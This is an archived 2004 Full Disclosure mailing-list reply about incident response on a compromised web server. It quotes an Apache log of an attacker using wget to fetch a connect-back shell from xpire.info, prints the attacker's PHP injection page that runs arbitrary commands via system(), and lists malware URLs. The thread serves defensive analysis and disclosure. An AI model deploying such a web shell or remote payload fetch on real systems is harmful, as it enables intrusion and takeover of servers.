Full Disclosure mailing list archives
Re: xpire.info & splitinfinity.info - exploits in the wild
From: "Elia Florio" <eflorio () edmaster it>
Date: Sun, 24 Oct 2004 21:06:51 +0200
I'm not sure that qmail-inject isn't a red herring? The actual download looks like 'wget' was used.
Good suggestion, my friend :) It was used WGET to retrieve the http://xpire.info/cli.gz connectback shell. After other analysis I've found that another person had the same problem: http://groups.google.it/groups?hl=it&lr=&selm=2wrKc-2TW-49%40gated-at.bofh.it Here the log trapped by Apache : ---------------------------------------------------------------------------- ---- [Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem) ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory ls: /usr/include/sdk386: No such file or directory ls: /usr/bin/X11/X: No such file or directory ls: /usr/include/sdk386: No such file or directory ls: /usr/bin/X11/X: No such file or directory --18:06:28-- http://xpire.info/cli.gz => `/tmp/a.out' Resolving xpire.info... done. Connecting to xpire.info[202.99.23.162]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,147 [text/plain] 0K .......... ........ 100% 20.04 KB/s 18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147] ------------------------------------------------------------------------ If you compare the output, it's possible to see that in my first showed log the stdout was in italian language (cause compromised server is .it), in this case is in english language. The hacker launched WGET command to retrieve his hacking tool in /tmp/a.out In this log you can see also that the hacker also try to execute some "ls" command, as first trial to test vulnerability I suppose. Moved by this, after other analysis I found that vulnerability used is an obvious-but-effective PHP-Injection using global variables (http://www.securityfocus.com/archive/1/218000 is a good page to learn something about this vuln). The hacker page used to accomplish the injection are based on this test-page, taken directly on the hacker-site :-) http://xpire.info/s/2 http://xpire.info/s/ I notice that this site is full of trojan/backdoor/shell/worm/exploit and other malware....why is it still open? http://xpire.info/cli.gz // connect back shell http://xpire.info/fa/aga.exe // agobot family http://xpire.info/install.gz // some trojan/malware ???? my NortonAV does not catch it; it's a Windows-EXE This is the sample of PHP-Injection page: <? $OS = system('uname -a'); $X = system('ls -la /usr/bin/X11/X'); echo "<OS>".$OS."</OS><br>"; echo "<X>".$X."</X>"; ?> <form action="<?=$REQUEST_URI;?>" method=POST> <input type=text name=lox value='<?=$lox;?>' size=40><br> <input type=submit> </form> <pre> <xmp> <?=system($lox);?> </xmp> </pre> Using PHP "system" call, it possible to execute any remote command, like WGET for example. Anyone knows before this page???
I assume you used a bootable CD on the infected machine to do the
checksums? Unfortunately (I know that this is a *must* for a good analysis) I'm doing the check remotely, using SSH, so I cannot use a bootable CD to connect at this remote host very far from me :) I'm limited in the analysis.....but the host is not mine! However I think that md5um give me good results, because I compared all the /usr/sbin directory and all the checksum were good, except for /usr/sbin/crond......any ideas??? I used also "rpm -Vf" utility to cross check results, and were the same of md5sum.
Check the httpd.conf (and other apache configuration files) for any changes, and also the contents of each module loaded. It's also possilble, but less likely, that the injection is done in a kernel module.
It's my fear :(((((((((( I studied all *.conf related to Apache/PHP modules of this machine, but nothing was found. A LKM injected could be the only response. I also ran "chkrootkit" as someone suggest to me, but all the test give positive answer (no worm, no rootkit, no trojan)
Sounds like a good time to replace the entire server with a fresh build.
Actually my work will finish when this activity will begin :)))))) Thank you for the help, Kevin. EF _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Nick FitzGerald (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Ron DuFresne (Oct 25)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 26)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- <Possible follow-ups>
- Re: xpire.info & splitinfinity.info - exploits in the wild bowwow (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 27)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 27)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)